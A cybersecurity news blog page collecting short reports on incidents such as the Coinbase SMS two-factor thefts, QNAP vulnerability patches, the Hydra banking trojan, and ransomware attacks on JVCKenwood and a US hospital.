Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

User Security
Cryptocurrency Frauds Data Breach Hacking Phishing email User Credentials User Data User Privacy User Security

Coinbase: Hackers Stole Cryptocurrency From Around 6,000 Customers

 

Crypto Exchange Coinbase has revealed that hackers successfully stole money from at least 6,000 Coinbase users this spring, partly by exploiting a vulnerability in the cryptocurrency exchange's two-factor authentication mechanism. 

Coinbase is the world's second-largest bitcoin exchange with over 68 million users from over 100 countries. In a data breach warning delivered to impacted clients this week, Coinbase disclosed the hacking activity. The notice states, “At least 6,000 Coinbase customers had funds removed from their accounts, including you,” 

Account breaches happened between March 2021 and May 20, 2021. Coinbase estimates hackers launched a wide-scale email phishing effort to deceive a significant number of customers into providing their email addresses, passwords, and phone numbers. 

Furthermore, the unknown attackers got access to victims' email inboxes through the use of malicious software competent of reading and writing to the inbox if the user enables permission. Although, a password is insufficient to gain access to a Coinbase account. 

The business secures an account by default using two-factor authentication, which means users must enter both a password and a one-time passcode issued on the phone to log in. 

However, the hackers were capable to obtain the one-time passcode in certain situations. This happened to users who used the two-factor authentication method, which depends on SMS texts to deliver the code. 

A spokesperson for the cryptocurrency exchange told PCMag in a statement, “Once the attackers had compromised the user’s email inbox and their Coinbase credentials, in a small number of cases they were able to use that information to impersonate the user, receive an SMS two-factor authentication code, and gain access to the Coinbase customer account.” 

Coinbase did not go into detail about how the impersonation occurred. However, according to the statement, the attackers employed a SIM-swapping attack to deceive the cell phone carrier into transferring over the victim's phone number. 

In response, Coinbase says it’s been compensating victims for the stolen cryptocurrency, following reports the company did little to help consumers hit in the hack. 

A company spokesperson added, “We immediately fixed the flaw and have worked with these customers to regain control of their accounts and reimburse them for the funds they lost.” 

It's also unclear how the issue was resolved. Coinbase, on the other hand, is pushing consumers to abandon the SMS-based two-factor verification scheme for more secure alternatives. This includes utilising a smartphone app to generate the one-time passcode or a hardware-based security key. 
Read more »
XSS Attacks
attackers Cyber Security Malicious Codes Taiwan XSS Attacks

QNAP Patched a Flaw that Allowed Attackers to Remotely Execute Malicious Commands

 

QNAP, a Taiwanese NAS manufacturer, has issued security updates for numerous vulnerabilities that might allow attackers to remotely inject and execute malicious code and commands on susceptible NAS systems. File sharing, virtualization, storage management, and surveillance applications all employ network-attached storage (NAS) appliances. The headquarters of QNAP is located in the Xizhi District of New Taipei City, Taiwan. QNAP began as a department of the IEI Integration Corporation, a Taiwan-based industrial computer services provider. 

Three high-severity stored cross-site scripting (XSS) vulnerabilities (recorded as CVE-2021-34354, CVE-2021-34356, and CVE-2021-34355) affect devices running unpatched Photo Station software (releases before 5.4.10, 5.7.13, or 6.0.18), according to QNAP.

In addition, QNAP fixed a stored XSS Image2PDF problem that affected devices running software versions prior to Image2PDF 2.1.5. Threat actors can use stored XSS attacks to inject malicious code remotely and store it on the targeted servers indefinitely after successful exploitation.

Stored attacks are ones in which the injected script is kept on the target servers indefinitely, such as in a database, a chat forum, a visitor log, a comment field, and so on. When the victim requests information from the server, the malicious script is downloaded. 

A command injection bug (CVE-2021-34352) affecting some QNAP end-of-life (EOL) devices running the QVR IP video surveillance software was also fixed, allowing attackers to run arbitrary operations. Successful attacks leveraging the CVE-2021-34352 bug could result in NAS devices being completely taken over.

In April, QNAP NAS operating systems QTS and QuTS Hero were patched for a command injection vulnerability (CVE-2020-2509). The other critical flaw (CVE-2020-36195), which affected any QNAP NAS devices running Multimedia Console or the Media Streaming add-on, was also patched in the same batch of firmware upgrades.

 “Both vulnerabilities are simple to exploit if you know the exact technical details,” said Yaniv Puyeski, a security researcher of SAM Seamless Network. 

 The significant, pre-authenticated flaws, which require only network access to the susceptible services, highlight an insecure, all-too-common way of using the devices, according to Puyeski. “Unfortunately, a lot of QNAP owners expose their device to the internet through port forwarding which puts them at very high risk to be hacked,” he explained.
Read more »
Personal Data
Azure Credential Stuffing Credentials Leak Dark Web Data Breach Disney Mozilla Mozilla Firefox Personal Data

Mozilla: Maximum Breached Accounts had Superhero and Disney Princes Names as Passwords

 

The passwords that we make for our accounts are very similar to a house key used to lock the house. The password protects the online home (account) of personal information, thus possessing an extremely strong password is just like employing a superhero in a battle of heroes and villains. 

However, according to a new blog post by Mozilla, superhero-themed passwords are progressively popping up in data breaches. Though it may sound absurd - following the research done by Mozilla using the data from haveibeenpwned.com, it was evident that most frequent passwords discovered in data breaches were created on either the names of superheroes or Disney princesses. Such obvious passwords make it easier for hackers to attack and hijack any account or system. 

While analyzing the data it was seen that 368,397 breaches included Superman, 226,327 breaches included Batman, and 160,030 breaches had Spider-Man as their passwords. Further, thousands of breaches featured Wolverine and Ironman as well. And not only this research from 2019 showed that 192,023 breached included Jasmine and 49,763 breached included Aurora as their password.

There were 484,4765 breached that had password as ‘princess’ and some Disney + accounts had password as ‘Disney’. This is one of the biggest reasons that support data breaches by hackers and boost their confidence.

With the increasing frequency of compromised account credentials on the dark web, a growing number of businesses are turning to password-less solutions. Microsoft has expanded its password-less sign-in option from Azure Active Directory (AAD) commercial clients to use Microsoft accounts on Windows 10 and Windows 11 PCs. 

Almost all of Microsoft's employees are passwordless, according to Vasu Jakkal, corporate vice president of the Microsoft Security, Compliance, Identity, and Management group.

"We use Windows Hello and biometrics. Microsoft already has 200 million passwords fewer customers across consumer and enterprise," Jakkal said. "We are going completely passwordless for Microsoft accounts. So you don't need a password at all," he further added. 

Though it's common to reuse passwords, it is highly dangerous, yet it's all too frequently because it's simple and people aren't aware of the consequences. Credential stuffing exploits take advantage of repeated passwords by automating login attempts targeting systems utilizing well-known email addresses and password pairings. One must keep changing their passwords from time to time and try to create a strong yet not so obvious password.
Read more »
ransomware attacks
BEC frauds Business Email Compromise Cyber Security Ransom Ransom Attack Ransomware ransomware attacks

Ransomware Attacks At An All Time High, Reports Palo Alto

 

Presently, RaaS (ransom as a service) and ransomware attacks are at an all time high, topping the list in cybersecurity community since the last few months, threat actors and hackers are constantly attacking businesses, corporate and emails for personal monetory gains. The BEC (Business Email Compromise), EAC (personal email account compromise) , scams have caused the most threat and impact, as per the cybersecurity reports. 

FBI in its enquiry found that BEC and EAC accounts for a minimum $1.86 billion losses in 2020, that too in the US region only, a 5% jump in losses compared to 2019. EAC and BEC amount for 45% of total reported cybersecurity incidents in the US and 11% of users are over the age of 60. 

A roughly estimate suggests that largest reported ransomware payment till date has been $40 million. Unit 42 reports "when scammers use this tactic, it usually starts with a baited email enticing the recipient to open the attachment or click on the link to a webpage. 

The emails usually focus on some segment of business operations (including finance, human resources, logistics and general office operations) and point to an attachment or link related to topics requiring user action." Experts say that average ransomware demands in 2020 were $847,344, meanwhile, the average ransom that victims paid was $312,493. 

In 2021, the ransom amount paid has risen upto 82% to $570,000. The amount mentioned for average ransom clients paid only includes direct financial losses given in ransoms. They do not include losses related with organization which lost revenue while being compelled to work in a compromised state during a cyberattack, and do not consist resources cost during the incident breach, but only include attacks that are known. The company decides not to report a cybersecurity incident depending upon nature and impact of the ransomware attack. 

In the end, the decision complicates it for federal and cybersecurity agencies to calculate the full impact of these attacks. The EAC and BEC ransomware attacks have one thing in common, they need access privilege to victim's account and networks. 

"The lucrative nature of BEC/EAC scams drives criminals to continually modify and upgrade their tactics to defeat protections. One of the newer techniques integrates spear phishing, custom webpages and the complex cloud single sign-on ecosystem to trick users into unwittingly divulging their credentials," reports Unit 42 of palo alto networks.
Read more »
User Security
Cyber Attacks Data Breach Ransomware attack User Privacy User Security

Private Details of Thousands of Customers Leaked in Hawaii Firm Ransomware Attack

 

Hawaii payroll processing firm has confirmed the data breach which affected nearly 4,500 customers. The company suffered a ransomware attack in mid-February that exposed social security numbers, dates of birth, the full names of clients, and bank details. 

“The company’s server were breached by someone able to gain access to Hawaii Payroll's systems through a compromised client account and execute a privilege escalation attack that enabled the intruder to disable and remove security software and encrypt all data residing in Hawaii Payroll's servers," according to the company. 

To mitigate the risks, the firm suspended all remote client access and asked its third-party vendor that manages information technology operations to examine the extent of the breach. The company filed a complaint with the Federal Bureau of Investigation's Honolulu field office and also notified state regulators and credit reporting agencies. 

Earlier this year in May, the company sent letters to customers potentially impacted by the ransomware attack, but some were returned unopened, and the company is still trying to secure access to many of the files that were encrypted by the attacker, said company owner Michelle Wells-Nagamine in an interview with the Honolulu Star-Advertiser. 

Fortunately, there have been no reports of data leakage on the dark web. "We got everything put back in for this year, and we marched forward. That's all I can do. The company retained "expert forensic assistance to further investigate and remediate the situation and to suggest security improvements,” she added.

According to the state Department of Commerce and Consumer Affairs, Hawaii Payroll Services, established in July 2003, is a domestic limited liability that offers payroll processing, 401 (k) reporting, and payroll tax filing. It serves more than 120 local companies, including Rainforest at Kilohana Square, Diamond Bakery, Yummy's BBQ and Jean's Warehouse.

According to the U.S. Department of Justice, cybercrimes surged by 40% in 2020, from 467,361 complaints that cost U.S. citizens nearly $3.5 billion in 2019 to 791,790 complaints and $4.2 billion in losses in 2020. Additionally, the FBI's Internet Crime Complaint Center received 2,474 ransomware reports last year which accounted for over $29.1 million in losses.

However, estimates of lost business, time, wages, files or equipment, or any third-party remediation services acquired by a victim were not included in a dollar figure. In some instances, victims do not report losses to the federal government, generating an artificially low overall ransomware loss rate.
Read more »
Russia
America China Cyber Criminals Cyber Security cyber threat Iran North Korea Russia

NSA’s Cyber Chief Warned About the Increasing Cyber Threat

 

On Wednesday the 29th of September, the chief of the cyber branch of the National Security Agency cautioned about the growing number of digital dangers and threats that these cybercriminals pose. 

Rob Joyce, Director of the NSA Cybersecurity Directorate, stated during the ASPEN Cyber Summit in Colorado that nearly every single government in the world today has a cyber exploitation program. 

Joyce has been a special assistant of the president and cyber security coordinator of the National Security Council in 2018, with many other responsibilities in the nation's leading e-spy agency. 

“The vast majority of those are used for espionage and intelligence purposes, but… there is interest in dabbling in offensive cyber and outcomes. The difference between the top of the list and the bottom of the list, usually, is scale,” stated Joyce. 

There are some “high-end, sophisticated small actors, but they’re confined to whatever that national interest is that they’re aimed at so we see less of them.” 

Joyce also gave his evaluated statements on the so-called "Big Four" and the latest internet business of the foreign states who were historically the digital opponents of America — Russia, China, Iran, and North Korea. 

Starting with Russia he said that, it's the distressing force. Often they attempt not to boost their activities but to pull others down. They are still extremely active in intelligence-gathering efforts targeting vital infrastructure and countries. The problem is that they employ disruptive effects all around the world aggressively. The organization saw indications of U.S. vital infrastructure pre-positioning. For this everyone must strive against every item that can't be permitted. 

Further, talking about China he noted that, Chinese is off the charts, considering the scale and scope. The number of cyber actors from China is growing all over the world. NSA respected them less than that from four or five years ago to the present day, the changes as perceived. They have always been wide, loud, and boisterous, and what the organization discovers, the elite in that group is the elite if one has such a vast resource base. 

“The high end of the Chinese sophistication is really good. We’ve got to continue to understand, disrupt and then find ways across the whole of that technology to kind of push back… Yes, defense is really important, but you also have to work to disrupt so that’s the continuous engagement strategy out of the [Defense Department] and the idea that we got to put sand and friction in their operations, so they don’t get just free shots on goal,” he added. 

Later he made statements about Iran saying that Iran is still operational in cyber activities. Certainly, they were the first and foremost nation when everyone spoke of a bank distributed denial of service operations and the Shamoon Wiper malware. However what NSA observed is that they often concentrate very much on regional matters, at present. Their attention was not as broad on the impact. But they are capable, especially because their decision is less judgmental, and most crucially because it is a realistic measure. Iran sometimes does not appreciate how much it has done to, or has gone far as to arouse the wrath and concern of the larger community. 

Lastly, he told that North Korea remains extremely focused on the regime's income creation, as North Korea can not be affected even with several sanctions. They, therefore, had to develop ways to create cash, trade and realized that it is simpler to steal Bitcoin than to steal from Bangladesh Bank. They didn't attack the largest banks as hard, since in the crypto realm they made their required money. 

“The commercial firms were dealing with a lot of North Korean issues back when the [Covid-19] vaccine was an issue; they were going after the intellectual property of vaccine makers. So, still active, still a threat, very capable but mostly focused on crypto exchanges and creating money.” He added. 
Read more »
User Security
Data Breach data security Neiman Marcus NMG User Data User Security

Neiman Marcus Announced Data Breach Millions Are Affected

American luxury retailer Neiman Marcus Group (NMG) has published a cyber security report in which it has disclosed a major data breach that directly impacted around 4.6 million consumers. The company told in a press release that they have already started alerting 4.6 million customers regarding their personal credentials associated with online services accounts that may have been accessed by a third party in May 2020. 

According to the organization, the breach took place in the month of May last year. The company got an alert when “an unauthorized party” got access to the personal credentials of some of Neiman Marcus's consumers from their online accounts. 

Following the incident, the company joined hands with law enforcement agencies and will do a further investigation with the cybersecurity company Mandiant. 

As part of the breach, the personal information of the users was stolen including Names, usernames, and passwords of Neiman Marcus online accounts addresses, contact information, Payment card numbers, and expiration dates (although no CVV numbers), Neiman Marcus virtual gift card numbers (without PINs), and security questions of Neiman Marcus online accounts. Around 3.1 million payment and virtual gift cards were compromised. However, around 85 percent of these were out of service or invalid. 

The breach did not affect the customers data of Bergdorf Goodman and Horchow who are a part of the Neiman Marcus Group. Following the incident, the company suggested its customers change passwords of their accounts and report if they experience any weird activity in their system. 

"At Neiman Marcus Group, customers are our top priority," CEO Geoffroy van Raemdonck said in a statement Friday. "We are working hard to support our customers and answer questions about their online accounts. We will continue to take actions to enhance our system security and safeguard information."


Read more »
Trojan
Android Bank Cyber Security Banking Malware Banking scam Hydra Malware malware Malware Trojan Trojan

Hydra Malware Targets Germany's Second Largest Bank Customers

 

The Hydra banking trojan has resurfaced to target European e-banking platform users, especially Commerzbank customers, Germany's second-largest financial institution. 

MalwareHunterTeam discovered the two-year-old virus in a fresh dissemination operation that targets German users with a malicious APK called 'Commerzbank Security' with a lookalike icon to the legitimate application. 

This grabbed the attention of Cyble researchers, who sampled the file for a more in-depth study, revealing a sophisticated phishing tool with broad rights access. 

According to Cyble experts, Hydra is still evolving; the variations used in the latest campaign include TeamViewer features, similar to the S.O.V.A. Android banking Trojan, and utilize various encryption methods to avoid detection, as well as Tor for communication. 

The latest version additionally allows to turn off the Play Protect Android security function. The virus demands two very hazardous permissions, BIND_ACCESSIBILITY_PERMISSION and BIND_DEVICE_ADMIN, according to the experts. 

The Accessibility Service is a background service that assists users with disabilities, and the BIND_ACCESSIBILITY_SERVICE permission permits the app to access it. 

The analysis published by Cyble states, “Malware authors abuse this service to intercept and monitor all activities happening on the device’s screen. For example, using Accessibility Service, malware authors can intercept the credentials entered on another app.” 

“BIND_DEVICE_ADMIN is a permission that allows fake apps to get admin privileges on the infected device. Hydra can abuse this permission to lock the device, modify or reset the screen lock PIN, etc.” 

Other rights are requested by the malware to carry out harmful activities such as accessing SMS content, sending SMSs, making calls, modifying device settings, spying on user activity, and sending bulk SMSs to the victim's contacts: 
  • CHANGE_WIFI_STATE : Modify Device’s Wi-Fi settings 
  • READ_CONTACTS: Access to phone contacts 
  • READ_EXTERNAL_STORAGE: Access device external storage 
  • WRITE_EXTERNAL_STORAGE: Modify device external storage 
  • READ_PHONE_STATE: Access phone state and information 
  • CALL_PHONE: Perform call without user intervention 
  • READ_SMS : Access user’s SMSs stored in the device 
  • REQUEST_INSTALL_PACKAGES : Install applications without user interaction 
  • SEND_SMS: This allows the app to send SMS messages 
  • SYSTEM_ALERT_WINDOW: The display of system alerts over other apps 
The code analysis shows that many classes are missing from the APK file. To avoid signature-based detection, the malicious code uses a custom packer. 

Cyble concluded, “We have also observed that the malware authors of Hydra are incorporating new technology to steal information and money from its victims. Alongside these features, the recent trojans have incorporated sophisticated features. We observed the new variants have TeamViewer or VNC functionality and TOR for communication, which shows that TAs are enhancing their TTPs.” 

“Based on this pattern that we have observed, malware authors are constantly adding new features to the banking trojans to evade detection by security software and to entice cybercriminals to buy the malware. To protect themselves from these threats, users should only install applications from the official Google Play Store.” 

18 million potential targets

Commerzbank has 13 million German clients and another 5 million in Central and Eastern Europe. This amounts to a total of 18 million potential targets, which is always an important factor for malware distributors. 

Typically, threat actors utilise SMS, social media, and forum postings to direct potential victims to malicious landing pages that install the APK on German devices. 

If anyone believes they have already fallen into Hydra's trap, it is suggested that they clean their device with a trustworthy vendor's security tool and then do a factory reset.
Read more »
United States
Crypto Currency Multi-factor authentication SMS Technology Threat actor United States

Thousands of Coinbase Clients were Robbed due to an MFA Flaw

 

After exploiting a vulnerability in Coinbase's SMS multi-factor authentication security mechanism, a threat actor stole cryptocurrency from 6,000 customers, according to the firm. A threat actor executed a hacking campaign between March and May 20th, 2021 to penetrate Coinbase customer accounts and steal cryptocurrency, according to a warning given to impacted consumers this week. 

The hackers apparently required to know the user's email address, password, and phone number, as well as have access to their email accounts, according to the US-based exchange, which has roughly 68 million customers from over 100 countries. It's unclear how the hackers got their hands on that information. 

"In this incident, for customers who use SMS texts for two-factor authentication, the third party took advantage of a flaw in Coinbase's SMS Account Recovery process in order to receive an SMS two-factor authentication token and gain access to your account," Coinbase told customers in electronic notifications. 

Customers' personal information was exposed as well, according to the report, "including their complete name, email address, home address, date of birth, IP addresses for account activity, transaction history, account holdings, and balances."

According to Coinbase, a flaw in their SMS account recovery process allowed hackers to acquire access to the SMS two-factor authentication token required to access a secured account. Coinbase claims to have updated the "SMS Account Recovery protocols" after learning of the incident, preventing any further bypassing of SMS multi-factor authentication. 

Because the Coinbase bug allowed threat actors to gain access to accounts that were thought to be secure, the exchange is depositing funds in affected accounts equal to the stolen amount. 

"We will be depositing funds into your account equal to the value of the currency improperly removed from your account at the time of the incident. Some customers have already been reimbursed -- we will ensure all customers affected receive the full value of what you lost," promised Coinbase. It's unclear whether Coinbase will credit hacked users with the stolen cryptocurrency or fiat currency. If fiat currency is used, it may result in a taxable event for the victims if their profits increase. 

Coinbase recommends implementing multi-factor authentication (MFA) with security keys, Time-based One-Time Passwords (TOTP) with an authenticator app, or SMS text messages as a last resort in their account security guide.
Read more »
ransomware attacks
Cyber Security Hacking Ransom Ransomware ransomware attacks

JVCKenwood Company Suffers Ransomware Attacks, Hackers Demand $7 Million Ransom

 

JVCKenwood was hit by a Conti ransomware attack, the attackers claim that 1.7 TB of data has been stolen and are asking for a $7 million ransom. JVCKenwood is an electronics multinational company from Japan having around 17000 employees and total revenue of $2.45 Billion in 2021. The company is famous for its brands Victor, Kenwood, and JVC which builds cat and home sound equipments, healthcare and radio equipments, portable power stations, and professional and in-vehicle cameras. 
Earlier this week, JVCKenwood revealed that its servers belonging to sales companies from Europe were compromised on 22 September and the hackers might have had access to data while the attack was ongoing. The company noticed unauthorized access in September 2021 to the servers handled by  JVCKenwood Group's sales organizations in Europe. The company in a press conference revealed that there might be a potential of data leak by third parties that made unauthorized entry attempts. 

As of now, a thorough inquiry is being done by external specialized firms of the company teamed up with associated authorities. Experts haven't confirmed any data leak, to date. Other details related to the breach would be given on the company website after they are available. According to experts, a source shared a ransom note for the Conti ransomware sample used in the JVCKenwood data breach. While negotiating, the hacking group claims to have stolen 1.5 TB of files and is asking $7 million for ransom for not leaking the data in return for providing the decryption key. To make sure that the attack was legit, the hackers shared a file that contained scanned passport copies of employees, as proof. 

After the hackers gave proof, the JVCKenwood representative hasn't made any contact with the hacker which means that the company isn't willing to pay the ransom. "Conti is a ransomware family believed to be operated by the TrickBot threat actor group and is commonly installed after networks are compromised by the TrickBot, BazarBackdoor, and Anchor trojans. The ransomware gang has been responsible for a wide range of attacks over the years, including high-profile attacks against the City of Tulsa, Ireland's Health Service Executive (HSE), Advantech, and numerous health care organizations," reports Bleeping Computers.
Read more »
US Hospital
Cyber Attacks Ransomware ransomware attacks US Hospital

Ransomware Attack on Hospital Associated with Baby’s Death

 

An infant birthed in Alabama subsequently died of heavy brain injury due to botching because the hospital faced a ransomware attack, a lawsuit states. However, this 2019 ransomware paralyzed hospital in the United States will defend itself in November against the death of a baby which is reportedly caused by a cyber attack. 

The file is the very first public credible allegation that anyone was killed at least partially by attackers who shut down hospital computers remotely in an effort at extraction, a steadily growing practice in cybercrime. 

The prosecution was originally reported by The Wall Street Journal by Teiranni Kidd, the baby's mother. It says that Springhill Medical Center, a hospital, had not told her that perhaps the hospital computers went down because of a cyberattack, and when she came to deliver her daughter, they provided her severely reduced treatment. 

In 2019, Springhill stated it had suffered a "network security incident," a typical cyber strike euphemism. Springhill stated at that time to see a regular amount of patients, as that of the local news station WKRG reported, although some of them turned away due to a ransomware attack. 

First, in January 2020 Kidd sued the hospital and then modified the case when her daughter died in July. A response request was not answered by the hospital. Kidd refused to speak since her case is underway. 

The legal proceedings showed that Kidd wasn't notified about the cyberattack when she went to give birth to a baby girl and also that doctors and nurses then overlooked several key tests, which showed that the umbilical cord was wrapped all around the neck of the baby and caused brain damage, which resulted in death, nine months later. 

“It’s an awful thing, but we’ve been expecting this for years to happen, because when things go wrong, eventually somebody’s going to die,” Liska said. 

It wasn't the first occasion wherein homicide allegations involving ransomware have been brought, but it is the first instance where a case has indeed been brought before the court. The nearest was an instance from September last when a German patient passed away in a re-routing ambulance owing to ransomware attacked the hospital. At the moment a negligent murder inquiry was initiated by German police and they stated that they could be liable for attacking them. 

Furthermore, given the time and lack of scruples to be directed at a healthcare center, Springhill has refused to name the ransomware behind the July 2019 attack.
Read more »
Subscribe to: Comments (Atom)